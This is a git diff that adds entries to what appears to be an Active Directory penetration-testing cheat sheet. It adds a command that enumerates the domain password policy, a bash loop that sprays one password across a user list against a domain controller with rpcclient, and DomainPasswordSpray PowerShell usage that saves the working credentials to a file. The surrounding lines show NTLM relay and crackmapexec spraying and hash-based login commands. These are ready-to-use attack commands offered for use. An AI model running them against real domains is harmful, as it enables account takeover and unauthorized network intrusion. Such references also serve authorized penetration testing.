diff --git a/ad/Readme.md b/ad/Readme.md
index daab232..4455545 100644
--- a/ad/Readme.md
+++ b/ad/Readme.md
@@ -230,6 +230,12 @@ python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "p
 python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "password" --unconstrained-computers | tee unconstrained-computers-enumeration
 ```
+#### Get password policy
+
+```
+python3 enum4linux-ng.py -P [dc-ip] -oA /tmp/wtf
+```
+
 ---
 #### Find smb not signed
@@ -300,6 +306,10 @@ python ntlmrelayx.py -6 -wh [domain name] -tf mytargets.txt -smb2support --http
 #### Password spraying
+```
+for i in $(cat valid-users.txt);do rpcclient -U "$i%PASSWORDTOSPRAY" -c "getusername;quit" [dc-ip] | grep Authority ;done
+```
+
 ```
 crackmapexec smb [dc-ip] --pass-pol -u '' -p ''
 ```
@@ -330,6 +340,13 @@ crackmapexec smb [ip-range] -u usernames.txt -p passwords.txt --no-bruteforce
 crackmapexec smb [ip-range] -H hashes.txt --no-bruteforce
 ```
+##### using windows
+
+```
+Import-Module .\DomainPasswordSpray.ps1
+Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
+```
+
 ---
 #### Password bruteforcing